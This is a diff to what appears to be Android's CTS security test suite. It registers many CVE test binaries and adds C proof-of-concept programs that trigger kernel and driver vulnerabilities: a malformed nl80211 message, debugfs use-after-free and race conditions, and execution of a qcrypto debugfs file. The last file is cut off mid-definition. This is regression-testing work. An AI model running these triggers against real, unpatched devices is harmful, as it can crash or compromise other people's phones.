diff --git a/hostsidetests/content/test-apps/CtsSyncAccountAccessOtherCertTests/src/com/android/cts/content/CtsSyncAccountAccessOtherCertTestCases.java b/hostsidetests/content/test-apps/CtsSyncAccountAccessOtherCertTests/src/com/android/cts/content/CtsSyncAccountAccessOtherCertTestCases.java
index 735de23..c2557ef 100644
--- a/hostsidetests/content/test-apps/CtsSyncAccountAccessOtherCertTests/src/com/android/cts/content/CtsSyncAccountAccessOtherCertTestCases.java
+++ b/hostsidetests/content/test-apps/CtsSyncAccountAccessOtherCertTests/src/com/android/cts/content/CtsSyncAccountAccessOtherCertTestCases.java
@@ -127,10 +127,10 @@
notification.click();
} else {
uiDevice.openNotification();
- uiDevice.wait(Until.hasObject(By.text("Permission requested")),
+ uiDevice.wait(Until.hasObject(By.text(PERMISSION_REQUESTED)),
UI_TIMEOUT_MILLIS);
- uiDevice.findObject(By.text("Permission requested")).click();
+ uiDevice.findObject(By.text(PERMISSION_REQUESTED)).click();
}
uiDevice.wait(Until.hasObject(By.text("ALLOW")),
@@ -152,16 +152,16 @@
private UiObject2 findPermissionNotificationInStream(UiDevice uiDevice) {
uiDevice.pressHome();
swipeUp(uiDevice);
- if (uiDevice.hasObject(By.text("Permission requested"))) {
- return uiDevice.findObject(By.text("Permission requested"));
+ if (uiDevice.hasObject(By.text(PERMISSION_REQUESTED))) {
+ return uiDevice.findObject(By.text(PERMISSION_REQUESTED));
}
for (int i = 0; i < 100; i++) {
if (!swipeUp(uiDevice)) {
// We have reached the end of the stream and not found the target.
break;
}
- if (uiDevice.hasObject(By.text("Permission requested"))) {
- return uiDevice.findObject(By.text("Permission requested"));
+ if (uiDevice.hasObject(By.text(PERMISSION_REQUESTED))) {
+ return uiDevice.findObject(By.text(PERMISSION_REQUESTED));
}
}
return null;
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f6c3547..d4cf524 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -63,24 +63,56 @@
<!-- Bulletin 2017-01 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-8457->/data/local/tmp/CVE-2016-8457" />
+ <option name="push" value="CVE-2016-8456->/data/local/tmp/CVE-2016-8456" />
+ <option name="push" value="CVE-2016-8455->/data/local/tmp/CVE-2016-8455" />
+
<!--__________________-->
<!-- Bulletin 2017-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-8420->/data/local/tmp/CVE-2016-8420" />
+ <option name="push" value="CVE-2016-8476->/data/local/tmp/CVE-2016-8476" />
+ <option name="push" value="CVE-2017-0441->/data/local/tmp/CVE-2017-0441" />
+ <option name="push" value="CVE-2017-0438->/data/local/tmp/CVE-2017-0438" />
+ <option name="push" value="CVE-2016-8481->/data/local/tmp/CVE-2016-8481" />
+ <option name="push" value="CVE-2017-0436->/data/local/tmp/CVE-2017-0436" />
+ <option name="push" value="CVE-2017-0445->/data/local/tmp/CVE-2017-0445" />
+ <option name="push" value="CVE-2017-0437->/data/local/tmp/CVE-2017-0437" />
<!--__________________-->
<!-- Bulletin 2017-03 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0453->/data/local/tmp/CVE-2017-0453" />
+ <option name="push" value="CVE-2016-8479->/data/local/tmp/CVE-2016-8479" />
+ <option name="push" value="CVE-2017-0508->/data/local/tmp/CVE-2017-0508" />
+ <option name="push" value="CVE-2017-0333->/data/local/tmp/CVE-2017-0333" />
+ <option name="push" value="CVE-2017-0463->/data/local/tmp/CVE-2017-0463" />
+ <option name="push" value="CVE-2017-0519->/data/local/tmp/CVE-2017-0519" />
+ <option name="push" value="CVE-2017-0520->/data/local/tmp/CVE-2017-0520" />
+ <option name="push" value="CVE-2017-0457->/data/local/tmp/CVE-2017-0457" />
+ <option name="push" value="CVE-2017-0460->/data/local/tmp/CVE-2017-0460" />
+ <option name="push" value="CVE-2017-0456->/data/local/tmp/CVE-2017-0456" />
+ <option name="push" value="CVE-2017-0521->/data/local/tmp/CVE-2017-0521" />
+
<!--__________________-->
<!-- Bulletin 2017-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0545->/data/local/tmp/CVE-2017-0545" />
<option name="push" value="Bug-32551280->/data/local/tmp/Bug-32551280" />
<!--__________________-->
<!-- Bulletin 2017-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-10283->/data/local/tmp/CVE-2016-10283" />
+ <option name="push" value="CVE-2017-0624->/data/local/tmp/CVE-2017-0624" />
+ <option name="push" value="CVE-2016-10288->/data/local/tmp/CVE-2016-10288" />
+ <option name="push" value="CVE-2017-0465->/data/local/tmp/CVE-2017-0465" />
+ <option name="push" value="CVE-2016-10289->/data/local/tmp/CVE-2016-10289" />
+ <option name="push" value="CVE-2016-10290->/data/local/tmp/CVE-2016-10290" />
+
<!--__________________-->
<!-- Bulletin 2017-06 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
@@ -135,6 +167,11 @@
<option name="push" value="Bug-36817053->/data/local/tmp/Bug-36817053" />
<option name="push" value="Bug-36730104->/data/local/tmp/Bug-36730104" />
+ <!--__________________-->
+ <!-- Bulletin 2017-11 -->
+ <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+
+ <option name="push" value="CVE-2017-6264->/data/local/tmp/CVE-2017-6264" />
<option name="append-bitness" value="true" />
</target_preparer>
diff --git a/hostsidetests/security/res/cve_2017_0859.mp4 b/hostsidetests/security/res/cve_2017_0859.mp4
new file mode 100644
index 0000000..1313815
--- /dev/null
+++ b/hostsidetests/security/res/cve_2017_0859.mp4
Binary files differ
diff --git a/hostsidetests/security/securityPatch/Bug-36492827/Android.mk b/hostsidetests/security/securityPatch/Bug-36492827/Android.mk
index dcc0b23..d2a91be 100644
--- a/hostsidetests/security/securityPatch/Bug-36492827/Android.mk
+++ b/hostsidetests/security/securityPatch/Bug-36492827/Android.mk
@@ -26,8 +26,10 @@
LOCAL_CTS_TEST_PACKAGE := android.security.cts
LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror
-LOCAL_CFLAGS += -Wno-literal-conversion -Wno-unused-parameter -Wno-unused-variable
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
LOCAL_LDFLAGS += -fPIE -pie
LDFLAGS += -rdynamic
include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10283/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-10283/Android.mk
new file mode 100644
index 0000000..cdc45bc
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10283/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-10283
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10283/poc.c b/hostsidetests/security/securityPatch/CVE-2016-10283/poc.c
new file mode 100644
index 0000000..295dfcc
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10283/poc.c
@@ -0,0 +1,112 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h>
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 1024
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+
+int test(void);
+int send_set_station(u_int16_t nlmsg_type, u_int32_t nlmsg_pid,
+ u_int8_t genl_cmd, u_int8_t genl_version);
+
+int send_set_station(u_int16_t nlmsg_type, u_int32_t nlmsg_pid,
+ u_int8_t genl_cmd, u_int8_t genl_version) {
+ struct nl_msg *msg;
+ int ret = -1;
+ unsigned char dst[ETH_ALEN];
+ unsigned char oper_classes[253];
+ struct nl80211_sta_flag_update flags;
+
+ msg = nlmsg_alloc();
+ int if_index = if_nametoindex("wlan0");
+
+ genlmsg_put(msg, nlmsg_pid, 0, nlmsg_type, 0, 0, genl_cmd, genl_version);
+
+ nla_put_u32(msg, NL80211_ATTR_IFINDEX, if_index);
+ nla_put(msg, NL80211_ATTR_MAC, ETH_ALEN, dst);
+
+ flags.mask = (1 << NL80211_STA_FLAG_TDLS_PEER);
+ flags.set = (1 << NL80211_STA_FLAG_TDLS_PEER);
+
+ nla_put(msg, NL80211_ATTR_STA_FLAGS2, sizeof(flags), &flags);
+
+ nla_put(msg, NL80211_ATTR_STA_SUPPORTED_OPER_CLASSES, sizeof(oper_classes),
+ oper_classes);
+
+ ret = nl_send_auto_complete(nl_sk, msg);
+
+ return 0;
+}
+
+#define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */
+#define AID_NET_RAW 3004 /* can create raw INET sockets */
+#define AID_NET_ADMIN 3005
+
+int test() {
+ int ret = 0;
+ int family_id = 0;
+
+ gid_t gid_groups[] = {AID_INET, AID_NET_ADMIN};
+ setgroups(sizeof(gid_groups) / sizeof(gid_groups[0]), gid_groups);
+
+ setuid(2000);
+
+ nl_sk = nl_socket_alloc();
+ ret = genl_connect(nl_sk);
+ if (ret != 0) {
+ return -1;
+ }
+
+ family_id = genl_ctrl_resolve(nl_sk, "nl80211");
+
+#define NL80211_CMD_SET_STATION 18
+
+ ret = send_set_station(family_id, getpid(), NL80211_CMD_SET_STATION, 1);
+ return 0;
+}
+
+int main(int argc, char *argv[]) { return test(); }
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10288/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-10288/Android.mk
new file mode 100644
index 0000000..46589ff
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10288/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-10288
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10288/poc.c b/hostsidetests/security/securityPatch/CVE-2016-10288/poc.c
new file mode 100644
index 0000000..2613edb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10288/poc.c
@@ -0,0 +1,56 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <asm/ioctl.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#define SIZE 64
+
+void trigger_crash(int fd);
+void testuaf(void);
+
+void trigger_crash(int fd) {
+ int i, ret = -1;
+ int count = 1000000;
+ char buf[SIZE] = {0};
+
+ for (i = 0; i < count; i++) {
+ ret = read(fd, buf, SIZE);
+ }
+}
+
+void testuaf(void) {
+const char *infopath = "/sys/kernel/debug/flashLED/strobe";
+ int fd1 = -1;
+ int fd2 = -1;
+
+ fd1 = open(infopath, O_RDWR);
+ fd2 = open(infopath, O_RDWR);
+ close(fd2);
+ trigger_crash(fd1);
+}
+
+int main(int argc, char *argv[]) {
+ testuaf();
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10289/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-10289/Android.mk
new file mode 100644
index 0000000..2330d04
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10289/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-10289
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10289/poc.c b/hostsidetests/security/securityPatch/CVE-2016-10289/poc.c
new file mode 100644
index 0000000..d57c516
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10289/poc.c
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+int main(int argc, char **argv) {
+ int ret;
+ char *h_argv[128];
+ char *h_envp[128];
+
+ ret = system("chmod +x /sys/kernel/debug/qcrypto/stats-1");
+ ret = execve("/sys/kernel/debug/qcrypto/stats-1", h_argv, h_envp);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10290/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-10290/Android.mk
new file mode 100644
index 0000000..e7da125
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10290/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-10290
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10290/poc.c b/hostsidetests/security/securityPatch/CVE-2016-10290/poc.c
new file mode 100644
index 0000000..f2a6904
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10290/poc.c
@@ -0,0 +1,59 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <asm/ioctl.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+void ThreadFun(void);
+void trigger(void);
+
+const char *infopath = "/sys/kernel/debug/rmt_storage/info";
+
+void ThreadFun(void) {
+ int fd = -1;
+ while (1) {
+ fd = open(infopath, O_RDWR);
+ if (fd > 0) {
+ close(fd);
+ fd = -1;
+ }
+ }
+}
+
+#define TC 100
+void trigger(void) {
+ int i, ret;
+ pthread_t tids[TC];
+ for (i = 0; i < TC; i++) {
+ ret = pthread_create((pthread_t *)&tids[i], NULL, (void *)ThreadFun, NULL);
+ }
+
+ for (i = 0; i < TC; i++) pthread_join(tids[i], NULL);
+}
+
+int main(int argc, char *argv[]) {
+ trigger();
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8420/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8420/Android.mk
new file mode 100644
index 0000000..47b6bff
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8420/Android.mk
@@ -0,0 +1,43 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License
+
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8420
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+ $(TOP)/external/libnl/include/ \
+ $(TOP)/external/libnl/lib/ \
+
+LOCAL_SHARED_LIBRARIES:= libnl
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8420/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8420/poc.c
new file mode 100644
index 0000000..a17ea26
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8420/poc.c
@@ -0,0 +1,486 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <dlfcn.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <jni.h>
+#include <android/log.h>
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <linux/genetlink.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <dirent.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <sys/types.h> /* See NOTES */
+#include <netlink/msg.h>
+#include <netlink/genl/genl.h>
+#include <netlink/genl/ctrl.h>
+#include <linux/nl80211.h>
+
+#define MAX_MSG_SIZE 1024
+#define GENLMSG_DATA(glh) ((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
+#define NLA_DATA(na) ((void *)((char *)(na) + NLA_HDRLEN))
+
+#define KGSL_IOC_TYPE 0x09
+
+struct kgsl_perfcounter_query_compat {
+ unsigned int groupid;
+ unsigned int countables;
+ unsigned int count;
+ unsigned int max_counters;
+ unsigned int __pad[2];
+};
+struct kgsl_perfcounter_read_group {
+ unsigned int groupid;
+ unsigned int countable;
+ unsigned long long value;
+};
+#define IOCTL_KGSL_PERFCOUNTER_QUERY_COMPAT \
+ _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query_compat)
+
+struct kgsl_perfcounter_read_compat {
+ unsigned int reads;
+ unsigned int count;
+ unsigned int __pad[2];
+};
+
+#define CAL_IOCTL_MAGIC 'a'
+
+#define AUDIO_GET_CALIBRATION _IOWR(CAL_IOCTL_MAGIC, 204, void *)
+
+#define NL80211_ATTR_MAC 6
+#define ETH_ALEN 6
+
+#define IEEE80211_MAX_SSID_LEN 32
+struct nl_sock *nl_sk;
+#define NL80211_ATTR_IFINDEX 3
+enum wlan_hdd_tm_attr {
+ WLAN_HDD_TM_ATTR_INVALID = 0,
+ WLAN_HDD_TM_ATTR_CMD = 1,
+ WLAN_HDD_TM_ATTR_DATA = 2,
+ WLAN_HDD_TM_ATTR_STREAM_ID = 3,
+ WLAN_HDD_TM_ATTR_TYPE = 4,
+ /* keep last */
+ WLAN_HDD_TM_ATTR_AFTER_LAST,
+ WLAN_HDD_TM_ATTR_MAX = WLAN_HDD_TM_ATTR_AFTER_LAST - 1,
+};
+
+enum wlan_hdd_tm_cmd {
+ WLAN_HDD_TM_CMD_WLAN_FTM = 0,
+ WLAN_HDD_TM_CMD_WLAN_HB = 1,
+};
+enum qca_wlan_vendor_attr_extscan_config_params {
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_INVALID = 0,
+
+ /* Unsigned 32-bit value; Middleware provides it to the driver. Middle ware
+ * either gets it from caller, e.g., framework, or generates one if
+ * framework doesn't provide it.
+ */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID,
+
+ /* NL attributes for data used by
+ * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_GET_VALID_CHANNELS sub command.
+ */
+ /* Unsigned 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_WIFI_BAND,
+ /* Unsigned 32-bit value */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS,
+
+ /* NL attributes for input params used by
+ * QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_START sub command.
+ */
+
+ /* Unsigned 32-bit value; channel frequency */
+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_CHANNEL,
